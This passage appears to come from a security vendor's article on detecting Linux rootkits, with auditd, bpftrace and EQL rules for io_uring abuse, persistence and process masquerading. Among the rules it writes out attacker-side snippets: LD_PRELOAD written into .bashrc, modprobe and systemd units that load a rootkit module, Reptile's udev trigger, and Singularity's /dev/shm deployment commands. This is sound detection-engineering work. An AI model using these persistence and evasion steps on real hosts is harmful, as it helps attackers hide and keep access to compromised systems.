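    echo &quot;sysctl absent (kernel &lt; 6.6): io_uring is unrestricted if compiled in&quot;
fi
</code></pre>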
<p>Detecting <code>io_uring</code>-based rootkits requires visibility into the syscalls that underpin their operation, such as <code>io_uring_setup()</code>, <code>io_uring_enter()</code>, and <code>io_uring_register()</code>.</p>
<p>While EDR solutions may struggle to capture the indirect effects of <code>io_uring</code>, Auditd can trace these syscalls directly. The following audit rule captures relevant events for analysis:</p>
<pre><code class="language-shell">-a always,exit -F arch=b64 -S io_uring_setup -S io_uring_enter -S io_uring_register -k io_uring
</code></pre>
<p>However, this only exposes the syscall usage itself, not the specific file or object being accessed. The real &quot;magic&quot; of <code>io_uring</code> happens in shared-memory rings managed by userland libraries (e.g., <code>liburing</code>), making analysis of syscall arguments essential.</p>
<p>For example, monitoring <code>io_uring_enter()</code> with <code>to_submit &gt; 0</code> indicates that an I/O operation is being batched, while alternating calls with <code>min_complete &gt; 0</code> signals completion polling. Correlating with process attributes (e.g., UID=0, unusual paths such as <code>/dev/shm</code>, <code>/tmp</code>, or <code>tmpfs</code>-backed locations) enhances detection efficacy.</p>
<p>A practical method for tracing <code>io_uring</code> activity is via eBPF with tools such as <code>bpftrace</code>, targeting tracepoints such as <code>sys_enter_io_uring_enter</code>. This allows analysts to monitor process behavior and active file descriptors during <code>io_uring</code> operations:</p>
<pre><code class="language-c">tracepoint:syscalls:sys_enter_io_uring_enter
{
    printf(&quot;\nPID %d (%s) called io_uring_enter with fd=%d, to_submit=%d, min_complete=%d, flags=%d\n&quot;,
        pid, comm, args-&gt;fd, args-&gt;to_submit, args-&gt;min_complete, args-&gt;flags);

    printf(&quot;Manually inspect with: ls -l /proc/%d/fd\n&quot;, pid);
}
</code></pre>
<p>To illustrate this, several techniques introduced by RingReaper were tested. Live tracing reveals the file descriptors in use, helping identify suspicious activity such as reading from <code>/run/utmp</code> to determine which users are logged in:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image16.png" alt="Figure 8: RingReaper users' command" title="Figure 8: RingReaper users' command." /></p>
<p>The activity of writing to a file, in this example <code>/root/test</code>:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image1.png" alt="Figure 9: RingReaper put command" title="Figure 9: RingReaper put command." /></p>
<p>Or listing process information via <code>ps</code> by reading the <code>comm</code> contents for each active PID:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image6.png" alt="Figure 10: RingReaper ps command" title="Figure 10: RingReaper ps command." /></p>
<p>While syscall monitoring exposes <code>io_uring</code> usage, it does not directly reveal the nature of the I/O without additional correlation. Because <code>io_uring</code> abuse is relatively new, it remains stealthy; it does, however, have clear limitations. <code>io_uring</code> cannot directly execute code, but attackers may abuse file writes (e.g., cron jobs, udev rules) to achieve delayed or indirect execution, as demonstrated by persistence techniques used by the Reptile and <a href="https://www.levelblue.com/blogs/spiderlabs-blog/unveiling-sedexp/">Sedexp</a> malware families.</p>
<h3>Rootkit persistence techniques</h3>
<p>Rootkits, whether in userland or kernel space, require some form of persistence to remain functional across reboots or user sessions. The methods vary depending on the type and privileges of the rootkit, but commonly involve abusing configuration files, service management, or system initialization scripts.</p>
<h4>Userland rootkits – environment variable persistence</h4>
<p>When using <code>LD_PRELOAD</code> to activate a userland rootkit, the behavior is not persistent by default. To achieve persistence, attackers may modify shell initialization files (e.g., <code>~/.bashrc</code>, <code>~/.zshrc</code>, or <code>/etc/profile</code>) to export environment variables such as <code>LD_PRELOAD</code> or <code>LD_LIBRARY_PATH</code>. These modifications ensure that every new shell session automatically inherits the environment required to activate the rootkit. Notably, these files exist for both user and root contexts. Therefore, even non-privileged users can introduce persistence that hijacks execution flow at their privilege level.</p>
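<p>As an illustration of how little is required, the attacker-side change is often a single appended line. The sketch below is hypothetical; the library path and name are invented for demonstration:</p>
<pre><code class="language-shell"># Hypothetical: persist a userland rootkit for one user by exporting
# LD_PRELOAD from their shell initialization file
echo 'export LD_PRELOAD=/usr/local/lib/libprochide.so' &gt;&gt; ~/.bashrc
# every new interactive bash session now preloads the shared object
grep 'LD_PRELOAD' ~/.bashrc
</code></pre>
<p>Any of the files in the rule below can serve the same purpose for other shells.</p>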
<p>To detect this, a rule similar to the one displayed below can be used:</p>
<pre><code class="language-sql">file where event.action in (&quot;rename&quot;, &quot;creation&quot;) and file.path like (
  // system-wide configurations
  &quot;/etc/profile&quot;, &quot;/etc/profile.d/*&quot;, &quot;/etc/bash.bashrc&quot;,
  &quot;/etc/bash.bash_logout&quot;, &quot;/etc/zsh/*&quot;, &quot;/etc/csh.cshrc&quot;,
  &quot;/etc/csh.login&quot;, &quot;/etc/fish/config.fish&quot;, &quot;/etc/ksh.kshrc&quot;,

  // root and user configurations
  &quot;/home/*/.profile&quot;, &quot;/home/*/.bashrc&quot;, &quot;/home/*/.bash_login&quot;,
  &quot;/home/*/.bash_logout&quot;, &quot;/home/*/.bash_profile&quot;, &quot;/root/.profile&quot;,
  &quot;/root/.bashrc&quot;, &quot;/root/.bash_login&quot;, &quot;/root/.bash_logout&quot;,
  &quot;/root/.bash_profile&quot;, &quot;/root/.bash_aliases&quot;, &quot;/home/*/.bash_aliases&quot;,
  &quot;/home/*/.zprofile&quot;, &quot;/home/*/.zshrc&quot;, &quot;/root/.zprofile&quot;, &quot;/root/.zshrc&quot;,
  &quot;/home/*/.cshrc&quot;, &quot;/home/*/.login&quot;, &quot;/home/*/.logout&quot;, &quot;/root/.cshrc&quot;,
  &quot;/root/.login&quot;, &quot;/root/.logout&quot;, &quot;/home/*/.config/fish/config.fish&quot;,
  &quot;/root/.config/fish/config.fish&quot;, &quot;/home/*/.kshrc&quot;, &quot;/root/.kshrc&quot;
)
</code></pre>
<p>Depending on the environment, several of these shells may not be in use, and a more tailored detection rule may be created, focusing only on <code>bash</code> or <code>zsh</code>, for example. The full detection logic using Elastic Defend and <a href="https://www.elastic.co/kr/docs/reference/integrations/fim">Elastic’s File Integrity Monitoring integration</a> can be found here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/5d98a212fcb980a37ee6be2327f861e5af3ede41/rules/linux/persistence_shell_configuration_modification.toml">Shell Configuration Creation</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/e012e88342d89d6d7f28aac4a7c744ef96b16067/rules/integrations/fim/persistence_suspicious_file_modifications.toml">Potential Persistence via File Modification</a></li>
</ul>
<p>For more information, a full breakdown of this persistence technique, including several other ways to detect its abuse, is presented in <a href="https://www.elastic.co/kr/security-labs/primer-on-persistence-mechanisms#t1546004---event-triggered-execution-unix-shell-configuration-modification">Linux Detection Engineering - A primer on persistence mechanisms</a>.</p>
<h4>Userland rootkits – configuration-based persistence</h4>
<p>Modifying the <code>/etc/ld.so.preload</code>, <code>/etc/ld.so.conf</code>, or the <code>/etc/ld.so.conf.d/</code> configuration files allows rootkits to persist globally across users and sessions (more information on this persistence vector is available in <a href="https://www.elastic.co/kr/security-labs/continuation-on-persistence-mechanisms#t1574006---hijack-execution-flow-dynamic-linker-hijacking">Linux Detection Engineering - A Continuation on Persistence Mechanisms</a>). Once written, the dynamic linker will continue injecting the malicious shared object unless these configurations are explicitly reverted. These methods are persistent by design. Detection strategies mirror those described in the previous section and rely on monitoring file creation or modification events in these paths.</p>
<h4>Kernel-space rootkits – LKM persistence</h4>
<p>Similar to userland rootkits, LKMs are not persistent by default. An attacker must explicitly configure the system to reload the malicious module on boot. This is typically achieved by leveraging legitimate kernel module loading mechanisms:</p>
<p><strong>Modules file: <code>modules</code></strong></p>
<p>This file lists kernel modules that should be loaded automatically during system startup. Adding a malicious <code>.ko</code> filename here ensures that <code>modprobe</code> will load it upon boot. This file is located at <code>/etc/modules</code>.</p>
<p><strong>Configuration directory for <code>modprobe</code></strong></p>
<p>This directory contains configuration files for the <code>modprobe</code> utility. Attackers may use aliasing to disguise their rootkit or autoload it when a specific kernel event occurs (e.g., when a device is probed). These modprobe configuration files are located at <code>/etc/modprobe.d/</code>, <code>/run/modprobe.d/</code>, <code>/usr/local/lib/modprobe.d/</code>, <code>/usr/lib/modprobe.d/</code>, and <code>/lib/modprobe.d/</code>.</p>
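<p>As an illustration, the <code>install</code> directive is a common abuse primitive here: it tells <code>modprobe</code> to run an arbitrary command when the named module is requested. The drop-in below is a hypothetical sketch with invented module and file names, staged in the current directory; an attacker would write it to <code>/etc/modprobe.d/</code>:</p>
<pre><code class="language-shell"># Hypothetical modprobe drop-in: any request for 'nf_tables_ext' now runs
# the attacker's command with root privileges
cat &gt; nf_tables_ext.conf &lt;&lt;'EOF'
install nf_tables_ext /sbin/insmod /usr/lib/modules/singularity.ko
EOF
cat nf_tables_ext.conf
</code></pre>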
<p><strong>Configure kernel modules to load at boot: <code>modules-load.d</code></strong></p>
<p>These configuration files specify which modules to load early in the boot process and are located at <code>/etc/modules-load.d/</code>, <code>/run/modules-load.d/</code>, <code>/usr/local/lib/modules-load.d/</code>, and <code>/usr/lib/modules-load.d/</code>.</p>
<p>To detect all of the persistence techniques listed above, a detection rule similar to the one below can be created:</p>
<pre><code class="language-sql">file where event.action in (&quot;rename&quot;, &quot;creation&quot;) and file.path like (
  &quot;/etc/modules&quot;,
  &quot;/etc/modprobe.d/*&quot;,
  &quot;/run/modprobe.d/*&quot;,
  &quot;/usr/local/lib/modprobe.d/*&quot;,
  &quot;/usr/lib/modprobe.d/*&quot;,
  &quot;/lib/modprobe.d/*&quot;,
  &quot;/etc/modules-load.d/*&quot;,
  &quot;/run/modules-load.d/*&quot;,
  &quot;/usr/local/lib/modules-load.d/*&quot;,
  &quot;/usr/lib/modules-load.d/*&quot;
)
</code></pre>
<p>This pre-built rule that combines all of the paths listed above into a single detection rule is available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/5d98a212fcb980a37ee6be2327f861e5af3ede41/rules/linux/persistence_lkm_configuration_file_creation.toml">Loadable Kernel Module Configuration File Creation</a></li>
</ul>
<p>An example of a rootkit that automatically deploys persistence using this method is Singularity. Within its deployment, the following commands are executed:</p>
<pre><code class="language-shell">read -p &quot;Enter the module name (without .ko): &quot; MODULE_NAME
CONF_DIR=&quot;/etc/modules-load.d&quot;
mkdir -p &quot;$CONF_DIR&quot;
echo &quot;[*] Setting up persistence...&quot;
echo &quot;$MODULE_NAME&quot; &gt; &quot;$CONF_DIR/$MODULE_NAME.conf&quot;
</code></pre>
<p>By default, this means that <code>singularity.conf</code> will be created as a new entry under <code>/etc/modules-load.d/</code>. Looking at telemetry, we detect this technique simply by monitoring for new file creations:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image19.png" alt="Figure 11: Telemetry example of Singularity’s LKM persistence technique" title="Figure 11: Telemetry example of Singularity’s LKM persistence technique." /></p>
<p>These directories are also used by benign LKMs and are therefore prone to false positives. Another persistence method is to use a trigger- or schedule-based technique that loads the kernel module by executing its loader.</p>
<h4>Udev-based persistence – Reptile example</h4>
<p>A less common but powerful persistence method involves abusing udev, the Linux device manager that handles dynamic device events. Udev executes rule-based scripts when specific conditions are met. A full breakdown of this technique is presented in <a href="https://www.elastic.co/kr/security-labs/sequel-on-persistence-mechanisms">Linux Detection Engineering - A Sequel on Persistence Mechanisms</a>. The <a href="https://codeberg.org/hardenedvault/Reptile-vault-range/src/commit/01dc5e1300bf1ba364870c8f4781e085c3c463e9/scripts/rule">Reptile rootkit</a> demonstrates this technique by installing a malicious udev rule under <code>/etc/udev/rules.d/</code>:</p>
<pre><code class="language-shell">ACTION==&quot;add&quot;, ENV{MAJOR}==&quot;1&quot;, ENV{MINOR}==&quot;8&quot;, RUN+=&quot;/lib/udev/reptile&quot;
</code></pre>
<p>This rule likely served as inspiration for the <a href="https://www.levelblue.com/blogs/spiderlabs-blog/unveiling-sedexp/">Sedexp</a> malware discovered by LevelBlue. Here&#8217;s how the rule works:</p>
<ul>
<li><code>ACTION==&quot;add&quot;</code>: Triggers when a new device is added to the system.</li>
<li><code>ENV{MAJOR}==&quot;1&quot;</code>: Matches devices with major number “1”, typically memory-related devices such as <code>/dev/mem</code>, <code>/dev/null</code>, <code>/dev/zero</code>, and <code>/dev/random</code>.</li>
<li><code>ENV{MINOR}==&quot;8&quot;</code>: Further narrows the condition to <code>/dev/random</code>.</li>
<li><code>RUN+=&quot;/lib/udev/reptile&quot;</code>: Executes the Reptile loader binary when the above device is detected.</li>
</ul>
<p>This rule establishes persistence by triggering the execution of a loader binary whenever the <code>/dev/random</code> device is added. Because <code>/dev/random</code> is a widely used random number generator essential to numerous system applications and the boot process, the trigger fires reliably. Activation occurs only upon specific device events, and execution happens with root privileges through the udev daemon. To detect this technique, a detection rule similar to the one below can be created:</p>
<pre><code class="language-sql">file where event.action in (&quot;rename&quot;, &quot;creation&quot;) and file.extension == &quot;rules&quot; and file.path like (
  &quot;/lib/udev/*&quot;,
  &quot;/etc/udev/rules.d/*&quot;,
  &quot;/usr/lib/udev/rules.d/*&quot;,
  &quot;/run/udev/rules.d/*&quot;,
  &quot;/usr/local/lib/udev/rules.d/*&quot;
)
</code></pre>
<p>We cover the creation and modification of these files via the following pre-built rules:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/5d98a212fcb980a37ee6be2327f861e5af3ede41/rules/linux/persistence_udev_rule_creation.toml">Systemd-udevd Rule File Creation</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/e012e88342d89d6d7f28aac4a7c744ef96b16067/rules/integrations/fim/persistence_suspicious_file_modifications.toml">Potential Persistence via File Modification</a></li>
</ul>
<h4>General persistence mechanisms</h4>
<p>In addition to kernel module loading paths, attackers may rely on more generic Linux persistence methods to reload userland or kernel-space rootkits via the loader:</p>
<p><strong>Systemd</strong>: <a href="https://www.elastic.co/kr/security-labs/primer-on-persistence-mechanisms">Create or append to a service/timer</a> unit under any systemd unit directory (e.g., <code>/etc/systemd/system/</code>) that executes the loader at boot.</p>
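<p>For illustration, such a unit might look as follows. The unit name, description, and loader path are hypothetical, and the file is staged in the current directory; an attacker would write it under <code>/etc/systemd/system/</code> and run <code>systemctl enable</code>:</p>
<pre><code class="language-shell"># Hypothetical oneshot unit that re-inserts a malicious LKM at every boot
cat &gt; sysupdate.service &lt;&lt;'EOF'
[Unit]
Description=System Update Service

[Service]
Type=oneshot
ExecStart=/sbin/insmod /usr/lib/modules/singularity.ko

[Install]
WantedBy=multi-user.target
EOF
cat sysupdate.service
</code></pre>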
<pre><code class="language-sql">file where event.action in (&quot;rename&quot;, &quot;creation&quot;) and file.path like (
  &quot;/etc/systemd/system/*&quot;, &quot;/etc/systemd/user/*&quot;,
  &quot;/usr/local/lib/systemd/system/*&quot;, &quot;/lib/systemd/system/*&quot;,
  &quot;/usr/lib/systemd/system/*&quot;, &quot;/usr/lib/systemd/user/*&quot;,
  &quot;/home/*.config/systemd/user/*&quot;, &quot;/home/*.local/share/systemd/user/*&quot;,
  &quot;/root/.config/systemd/user/*&quot;, &quot;/root/.local/share/systemd/user/*&quot;
) and file.extension in (&quot;service&quot;, &quot;timer&quot;)
</code></pre>
<p><strong>Initialization scripts</strong>: <a href="https://www.elastic.co/kr/security-labs/sequel-on-persistence-mechanisms">Create or append to a malicious run-control</a> (<code>/etc/rc.local</code>), <a href="https://www.elastic.co/kr/security-labs/sequel-on-persistence-mechanisms">SysVinit</a> (<code>/etc/init.d/</code>), or <a href="https://www.elastic.co/kr/security-labs/sequel-on-persistence-mechanisms">Upstart</a> (<code>/etc/init/</code>) script.</p>
<pre><code class="language-sql">file where event.action in (&quot;creation&quot;, &quot;rename&quot;) and
file.path like (
  &quot;/etc/init.d/*&quot;, &quot;/etc/init/*&quot;, &quot;/etc/rc.local&quot;, &quot;/etc/rc.common&quot;
)
</code></pre>
<p><strong>Cron jobs</strong>: <a href="https://www.elastic.co/kr/security-labs/primer-on-persistence-mechanisms">Create or append to a cron job</a> that allows for repeated execution of a loader.</p>
<pre><code class="language-sql">file where event.action in (&quot;rename&quot;, &quot;creation&quot;) and
file.path like (
  &quot;/etc/cron.allow&quot;, &quot;/etc/cron.deny&quot;, &quot;/etc/cron.d/*&quot;,
  &quot;/etc/cron.hourly/*&quot;, &quot;/etc/cron.daily/*&quot;, &quot;/etc/cron.weekly/*&quot;,
  &quot;/etc/cron.monthly/*&quot;, &quot;/etc/crontab&quot;, &quot;/var/spool/cron/crontabs/*&quot;,
  &quot;/var/spool/anacron/*&quot;
)
</code></pre>
<p><strong>Sudoers</strong>: <a href="https://www.elastic.co/kr/security-labs/primer-on-persistence-mechanisms">Create or append to a malicious sudoers configuration</a> as a backdoor.</p>
<pre><code class="language-sql">file where event.type in (&quot;creation&quot;, &quot;change&quot;) and
file.path like &quot;/etc/sudoers*&quot;
</code></pre>
<p>These methods are widely used, flexible, and often easier to detect using process lineage or file-modification telemetry.</p>
<p>The list of pre-built detection rules to detect these persistence techniques is listed below:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/93d20b1233fc94aea8f4a80062bd1f59069fb0c5/rules/linux/persistence_systemd_service_creation.toml">Systemd Service Created</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/93d20b1233fc94aea8f4a80062bd1f59069fb0c5/rules/linux/persistence_systemd_scheduled_timer_created.toml">Systemd Timer Created</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/93d20b1233fc94aea8f4a80062bd1f59069fb0c5/rules/linux/persistence_init_d_file_creation.toml">System V Init Script Created</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/93d20b1233fc94aea8f4a80062bd1f59069fb0c5/rules/linux/persistence_rc_script_creation.toml">rc.local/rc.common File Creation</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/93d20b1233fc94aea8f4a80062bd1f59069fb0c5/rules/linux/persistence_cron_job_creation.toml">Cron Job Created or Modified</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/5d98a212fcb980a37ee6be2327f861e5af3ede41/rules/cross-platform/privilege_escalation_sudoers_file_mod.toml">Sudoers File Activity</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/e012e88342d89d6d7f28aac4a7c744ef96b16067/rules/integrations/fim/persistence_suspicious_file_modifications.toml">Potential Persistence via File Modification</a></li>
</ul>
<h3>Rootkit defense evasion techniques</h3>
<p>Although rootkits are, by definition, tools for defense evasion, many implement additional techniques to remain undetected during and after deployment. These methods are designed to avoid visibility in logs, evade endpoint detection agents, and interfere with common investigation workflows. The following section outlines key evasion techniques employed by modern Linux rootkits, categorized by their operational targets.</p>
<h4>Attempts to remain stealthy upon deployment</h4>
<p>Threat actors commonly focus on execution tactics that leave few forensic traces. For example, a threat actor may store and execute payloads from the <code>/dev/shm</code> shared-memory directory: because it is a fully virtual file system, the payloads never touch disk. This frustrates disk forensics, but from a behavioral detection standpoint, such activity is very suspicious and uncommon.</p>
<p>As an example, although not an actual threat actor, Singularity’s author suggests the following deployment method:</p>
<pre><code class="language-shell">cd /dev/shm
git clone https://github.com/MatheuZSecurity/Singularity
cd Singularity
sudo bash setup.sh
sudo bash scripts/x.sh
</code></pre>
<p>Several tripwires can be installed to detect this behavior with a near-zero false-positive rate, starting with the cloning of a GitHub repository into the <code>/dev/shm</code> directory.</p>
<pre><code class="language-sql">sequence by process.entity_id, host.id with maxspan=10s
  [process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and (
     (process.name == &quot;git&quot; and process.args == &quot;clone&quot;) or
     (
       process.name in (&quot;wget&quot;, &quot;curl&quot;) and
       process.command_line like~ &quot;*github*&quot;
     )
  )]
  [file where event.type == &quot;creation&quot; and
   file.path like (&quot;/tmp/*&quot;, &quot;/var/tmp/*&quot;, &quot;/dev/shm/*&quot;)]
</code></pre>
<p>Cloning directories in <code>/tmp</code> and <code>/var/tmp</code> is common, so these could be removed from this rule in environments where cloning repositories is common. The same activity in <code>/dev/shm</code>, however, is very uncommon.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image10.png" alt="Figure 12: Telemetry example of a GitHub repository cloning event in /dev/shm" title="Figure 12: Telemetry example of a GitHub repository cloning event in /dev/shm." /></p>
<p>The <code>setup.sh</code> script, called by the loader, continues by compiling the LKM in a <code>/dev/shm/</code> subdirectory. Real threat actors generally avoid compiling on the target host itself, though it is not that uncommon to observe in practice.</p>
<pre><code class="language-sql">sequence with maxspan=10s
  [process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
   process.name like (
     &quot;*gcc*&quot;, &quot;*g++*&quot;, &quot;c++&quot;, &quot;cc&quot;, &quot;c99&quot;, &quot;c89&quot;, &quot;cc1*&quot;, &quot;clang*&quot;,
     &quot;musl-clang&quot;, &quot;tcc&quot;, &quot;zig&quot;, &quot;ccache&quot;, &quot;distcc&quot;
   )] as event0
  [file where event.action == &quot;creation&quot; and file.path like &quot;/dev/shm/*&quot; and
   process.name like (
     &quot;ld&quot;, &quot;ld.*&quot;, &quot;lld&quot;, &quot;ld.lld&quot;, &quot;mold&quot;, &quot;collect2&quot;, &quot;*-linux-gnu-ld*&quot;, 
     &quot;*-pc-linux-gnu-ld*&quot;
   ) and
   stringcontains~(event0.process.command_line, file.name)]
</code></pre>
<p>This endpoint logic detects the execution of a compiler, followed by the linker creating a file in <code>/dev/shm</code> (or a subdirectory).</p>
<p>Finally, because the entire repository was cloned into <code>/dev/shm</code> and <code>setup.sh</code> and <code>x.sh</code> were executed from it, we will observe process execution from the shared-memory directory, which is uncommon in most environments:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
process.executable like (&quot;/dev/shm/*&quot;, &quot;/run/shm/*&quot;)
</code></pre>
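<p>Both tripwires are easy to reproduce when validating these rules, assuming <code>gcc</code> is installed on the test host:</p>
<pre><code class="language-shell"># Reproduce the tripwires: compile, then execute, a binary inside /dev/shm
mkdir -p /dev/shm/demo
printf 'int main(void) { return 0; }\n' &gt; /dev/shm/demo/t.c
gcc /dev/shm/demo/t.c -o /dev/shm/demo/t   # the linker writes an ELF into /dev/shm
/dev/shm/demo/t                            # execution from shared memory
rm -rf /dev/shm/demo
</code></pre>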
<p>These rules are available within the detection-rules and protections-artifacts repositories:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml">Git Repository or File Download to Suspicious Directory</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/331b0c762ef5293cea812a9b676e84527fbe5f73/behavior/rules/linux/defense_evasion_linux_compilation_in_suspicious_directory.toml">Linux Compilation in Suspicious Directory</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/473c8536449c12f4e6bf1dc7de4fbded217592a5/behavior/rules/linux/defense_evasion_binary_executed_from_shared_memory_directory.toml">Binary Executed from Shared Memory Directory</a></li>
</ul>
<h4>Masquerading as legitimate processes</h4>
<p>To avoid scrutiny during process enumeration or system monitoring, rootkits often rename their processes and threads to match benign system components. Common disguises include:</p>
<ul>
<li><code>kworker</code>, <code>migration</code>, or <code>rcu_sched</code> (kernel threads)</li>
<li><code>sshd</code>, <code>systemd</code>, <code>dbus-daemon</code>, or <code>bash</code> (userland daemons)</li>
</ul>
<p>These names are chosen to blend in with the output of tools like <code>ps</code>, <code>top</code>, or <code>htop</code>, making manual detection more difficult. Examples of rootkits that leverage this technique include Reptile and <a href="https://www.elastic.co/kr/security-labs/declawing-pumakit">PUMAKIT</a>. Reptile generates unusual network events through <code>kworker</code> upon initialization:</p>
<pre><code class="language-sql">network where event.type == &quot;start&quot; and event.action == &quot;connection_attempted&quot; 
and process.name like~ (&quot;kworker*&quot;, &quot;kthreadd&quot;) and not (
  destination.ip == null or
  destination.ip == &quot;0.0.0.0&quot; or
  cidrmatch(
    destination.ip,
    &quot;10.0.0.0/8&quot;, &quot;127.0.0.0/8&quot;, &quot;169.254.0.0/16&quot;, &quot;172.16.0.0/12&quot;,
    &quot;192.0.0.0/24&quot;, &quot;192.0.0.0/29&quot;, &quot;192.0.0.8/32&quot;, &quot;192.0.0.9/32&quot;,
    &quot;192.0.0.10/32&quot;, &quot;192.0.0.170/32&quot;, &quot;192.0.0.171/32&quot;, &quot;192.0.2.0/24&quot;, 
    &quot;192.31.196.0/24&quot;, &quot;192.52.193.0/24&quot;, &quot;192.168.0.0/16&quot;, &quot;192.88.99.0/24&quot;,
    &quot;224.0.0.0/4&quot;, &quot;100.64.0.0/10&quot;, &quot;192.175.48.0/24&quot;,&quot;198.18.0.0/15&quot;, 
    &quot;198.51.100.0/24&quot;, &quot;203.0.113.0/24&quot;, &quot;240.0.0.0/4&quot;, &quot;::1&quot;,
    &quot;FE80::/10&quot;, &quot;FF00::/8&quot;
  )
)
</code></pre>
<p>The example below shows Reptile’s port knocking functionality, where the kernel thread forks, changes its session ID to 0, and sets up the network connection:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image5.png" alt="Figure 13: Telemetry example of Reptile’s port knocking via a kernel worker thread" title="Figure 13: Telemetry example of Reptile’s port knocking via a kernel worker thread." /></p>
<p>Reptile is also seen to leverage the same <code>kworker</code> process to create files:</p>
<pre><code class="language-sql">file where event.type == &quot;creation&quot; and
process.name like~ (&quot;kworker*&quot;, &quot;kthreadd&quot;)
</code></pre>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image4.png" alt="Figure 14: Telemetry example of a /dev/ptmx file creation from Reptile’s kernel worker thread" title="Figure 14: Telemetry example of a /dev/ptmx file creation from Reptile’s kernel worker thread." /></p>
<p><a href="https://www.elastic.co/kr/security-labs/declawing-pumakit">PUMAKIT</a> spawns kernel threads to execute userland commands through <code>kthreadd</code>, but similar activity has been observed through a <code>kworker</code> process in other rootkits:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
process.parent.name like~ (&quot;kworker*&quot;, &quot;kthreadd&quot;) and
process.name in (&quot;bash&quot;, &quot;dash&quot;, &quot;sh&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;zsh&quot;, &quot;ksh&quot;, &quot;fish&quot;) and
process.args == &quot;-c&quot;
</code></pre>
<p>These <code>kworker</code> and <code>kthreadd</code> rules may generate false positives due to the Linux kernel's internal operations. These can easily be excluded on a per-environment basis, or additional command-line arguments can be added to the logic.</p>
<p>These rules are available in the detection-rules and protections-artifacts repositories:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/command_and_control_linux_kworker_netcon.toml">Network Activity Detected via Kworker</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/persistence_kworker_file_creation.toml">Suspicious File Creation via Kworker</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/privilege_escalation_kworker_uid_elevation.toml">Suspicious Kworker UID Elevation</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/473c8536449c12f4e6bf1dc7de4fbded217592a5/behavior/rules/linux/defense_evasion_shell_command_execution_via_kworker.toml">Shell Command Execution via Kworker</a></li>
</ul>
<p>Additionally, malicious processes, such as an initial dropper or a persistence mechanism, may masquerade as kernel threads by leveraging a shell builtin. With <code>exec -a</code>, any process can be spawned with an <code>argv[0]</code> of the attacker&#8217;s choosing. Kernel process masquerading can be detected through the following detection query:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and 
process.command_line like &quot;[*]&quot; and process.args_count == 1
</code></pre>
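<p>For reference, the masquerade itself can be reproduced with bash&#8217;s <code>exec -a</code> builtin, which sets the <code>argv[0]</code> of the replacement process; the kernel-thread name below is illustrative:</p>
<pre><code class="language-shell"># Spawn 'yes' so that its command line reads as a single-argument,
# bracketed kernel-thread name, which the query above looks for
bash -c 'exec -a &quot;[kworker/u8:2]&quot; yes &gt; /dev/null' &amp;
pid=$!
sleep 1
tr '\0' '\n' &lt; &quot;/proc/$pid/cmdline&quot;   # prints: [kworker/u8:2]
kill &quot;$pid&quot;
</code></pre>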
<p>This behavior is shown below, where several pieces of malware tried to masquerade as either a kernel worker or a web service process.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image8.png" alt="Figure 15: Telemetry example of several malwares masquerading as kernel processes" title="Figure 15: Telemetry example of several malwares masquerading as kernel processes." /></p>
<p>This technique is also commonly abused by threat actors leveraging The Hacker’s Choice (THC) toolkit, specifically upon deploying <a href="https://github.com/hackerschoice/gsocket">gsocket</a>.</p>
<p>Rules related to kernel masquerading, and masquerading via <code>exec -a</code> generally, are available in the protections-artifacts repository:</p>
<ul>
<li><a href="https://github.com/elastic/protections-artifacts/blob/473c8536449c12f4e6bf1dc7de4fbded217592a5/behavior/rules/linux/defense_evasion_process_masquerading_as_kernel_process.toml">Process Masquerading as Kernel Process</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/473c8536449c12f4e6bf1dc7de4fbded217592a5/behavior/rules/linux/defense_evasion_potential_process_masquerading_via_exec.toml">Potential Process Masquerading via Exec</a></li>
</ul>
<p>Another technique seen in the wild, and also in <a href="https://www.blackhat.com/docs/us-16/materials/us-16-Leibowitz-Horse-Pill-A-New-Type-Of-Linux-Rootkit.pdf">Horse Pill</a>, is the use of <code>prctl</code> to stomp the process name. To ensure this telemetry is available, a custom Auditd rule can be created:</p>
<pre><code class="language-shell">-a exit,always -F arch=b64 -S prctl -k prctl_detection
</code></pre>
<p>It can be paired with the following detection logic:</p>
